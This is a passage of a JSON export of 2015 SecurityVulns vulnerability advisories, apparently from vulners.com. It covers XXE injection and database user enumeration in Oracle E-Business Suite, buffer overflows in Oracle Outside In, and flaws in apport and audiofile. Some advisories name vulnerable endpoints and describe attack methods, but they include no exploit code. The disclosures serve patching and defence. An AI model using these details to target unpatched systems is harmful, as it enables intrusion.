minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4878", "CVE-2015-4877"], "description": "\r\n\r\n======================================================================\r\n\r\n Secunia Research (now part of Flexera Software) 26/10/2015\r\n\r\n Oracle Outside In Two Buffer Overflow Vulnerabilities\r\n\r\n======================================================================\r\nTable of Contents\r\n\r\nAffected Software....................................................1\r\nSeverity.............................................................2\r\nDescription of Vulnerabilities.......................................3\r\nSolution.............................................................4\r\nTime Table...........................................................5\r\nCredits..............................................................6\r\nReferences...........................................................7\r\nAbout Secunia........................................................8\r\nVerification.........................................................9\r\n\r\n======================================================================\r\n\r\n1) Affected Software\r\n\r\n* Oracle Outside In versions 8.5.0, 8.5.1, and 8.5.2.\r\n\r\n====================================================================== \r\n2) Severity\r\n\r\nRating: Moderately critical\r\nImpact: System Access\r\nWhere: From remote\r\n\r\n====================================================================== \r\n3) Description of Vulnerabilities\r\n\r\nSecunia Research has discovered two vulnerabilities in Oracle Outside\r\nIn Technology, which can be exploited by malicious people to cause a\r\nDoS (Denial of Service) and compromise an application using the SDK.\r\n\r\n1) An error in the vstga.dll when processing TGA files can be\r\nexploited to cause an out-of-bounds write memory access.\r\n\r\n2) An error in the libxwd2.dll when processing XWD files can be\r\nexploited to cause a stack-based buffer overflow.\r\n\r\nSuccessful exploitation of the vulnerabilities may allow execution of\r\narbitrary code.\r\n\r\n====================================================================== \r\n4) Solution\r\n\r\nApply update. Please see the Oracle Critical Patch Update Advisory\r\nfor October 2015 for details.\r\n\r\n====================================================================== \r\n5) Time Table\r\n\r\n14/07/2015 - Vendor notified of vulnerabilities.\r\n14/07/2015 - Vendor acknowledges report.\r\n16/07/2015 - Vendor supplied bug ticket ID.\r\n27/07/2015 - Vendor supplied information of fix in main codeline.\r\n24/09/2015 - Replied to vendor and asked about CVE references.\r\n25/09/2015 - Vendor replied that they check our request.\r\n27/09/2015 - Vendor assigned two CVE references.\r\n17/10/2015 - Vendor supplied 20/10/2015 as estimated fix date.\r\n20/10/2015 - Release of vendor patch.\r\n21/10/2015 - Public disclosure.\r\n26/10/2015 - Publication of research advisory.\r\n\r\n======================================================================\r\n\r\n6) Credits\r\n\r\nDiscovered by Behzad Najjarpour Jabbari, Secunia Research (now part\r\nof Flexera Software).\r\n\r\n======================================================================\r\n\r\n7) References\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned\r\nthe CVE-2015-4877 and CVE-2015-4878 identifiers for the\r\nvulnerabilities.\r\n\r\n======================================================================\r\n\r\n8) About Secunia (now part of Flexera Software)\r\n\r\nIn September 2015, Secunia has been acquired by Flexera Software:\r\n\r\nhttps://secunia.com/blog/435/\r\n\r\nSecunia offers vulnerability management solutions to corporate\r\ncustomers with verified and reliable vulnerability intelligence\r\nrelevant to their specific system configuration:\r\n\r\nhttp://secunia.com/advisories/business_solutions/\r\n\r\nSecunia also provides a publicly accessible and comprehensive advisory\r\ndatabase as a service to the security community and private\r\nindividuals, who are interested in or concerned about IT-security.\r\n\r\nhttp://secunia.com/advisories/\r\n\r\nSecunia believes that it is important to support the community and to\r\ndo active vulnerability research in order to aid improving the\r\nsecurity and reliability of software in general:\r\n\r\nhttp://secunia.com/secunia_research/\r\n\r\nSecunia regularly hires new skilled team members. Check the URL below\r\nto see currently vacant positions:\r\n\r\nhttp://secunia.com/corporate/jobs/\r\n\r\nSecunia offers a FREE mailing list called Secunia Security Advisories:\r\n\r\nhttp://secunia.com/advisories/mailing_lists/\r\n\r\n======================================================================\r\n\r\n9) Verification \r\n\r\nPlease verify this advisory by visiting the Secunia website:\r\nhttp://secunia.com/secunia_research/2015-04/\r\n\r\nComplete list of vulnerability reports published by Secunia Research:\r\nhttp://secunia.com/secunia_research/\r\n\r\n======================================================================\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32659", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32659", "title": "Secunia Research: Oracle Outside In Two Buffer Overflow Vulnerabilities", "type": "securityvulns", "cvss": {"score": 1.5, "vector": "AV:LOCAL/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4845"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite - Database user enumeration\r\nAdvisory ID: [ERPSCAN-15-025]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nDate published:20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: User Enumeration\r\nImpact: user enumeration, SSRF\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4845\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity None (N)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThere is a script in EBS that is used to connect to the database and\r\ndisplays the connection status. Different connection results can help\r\nan attacker to find existing database accounts.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.2.4\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nDatabase users enumeration\r\nVunerable script: Aoljtest.js\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-025-oracle-e-business-suite-database-user-enumeration-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32656", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32656", "title": "[ERPSCAN-15-025] Oracle E-Business Suite Database user enumeration Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1338"], "description": "Symbolic links and hadlinks vulnerability in log files, privilege escalation.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14720", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14720", "title": "apport security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4886"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite XXE injection\r\nAdvisory ID: [ERPSCAN-15-028]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4886\r\nCVSS Information\r\nCVSS Base Score: 6.4 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Low (L)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/copxml\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-028-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32653", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32653", "title": "[ERPSCAN-15-028] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "Crash on audiofiles processing.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14754", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14754", "title": "audiofile memory corruption", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}